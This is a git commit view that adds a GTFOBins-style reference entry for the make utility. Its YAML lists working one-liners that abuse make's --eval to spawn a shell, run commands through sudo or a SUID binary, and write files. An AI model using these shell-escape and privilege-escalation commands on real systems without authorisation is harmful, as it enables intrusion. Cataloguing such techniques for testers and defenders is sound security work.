Add base64, ltrace, make, sqlite3, time

This commit is contained in:
Dov Murik
2018-06-04 10:21:53 +00:00
parent 6e6cbb66a7
commit 5fa7efbc1c
5 changed files with 84 additions and 0 deletions

23
_gtfobins/make.md Normal file
View File

@@ -0,0 +1,23 @@
---
functions:
execute-interactive:
- code: |
COMMAND='/bin/sh 1>&2'
make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
execute-non-interactive:
- code: |
COMMAND=/usr/bin/id
make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
sudo-enabled:
- code: |
COMMAND=/usr/bin/id
sudo make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
suid-enabled:
- code: |
COMMAND=/usr/bin/id
./make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
file-write:
- code: |
LFILE=file_to_write
make -s --eval="a := \$(file >$LFILE,data)" --eval='all:'
---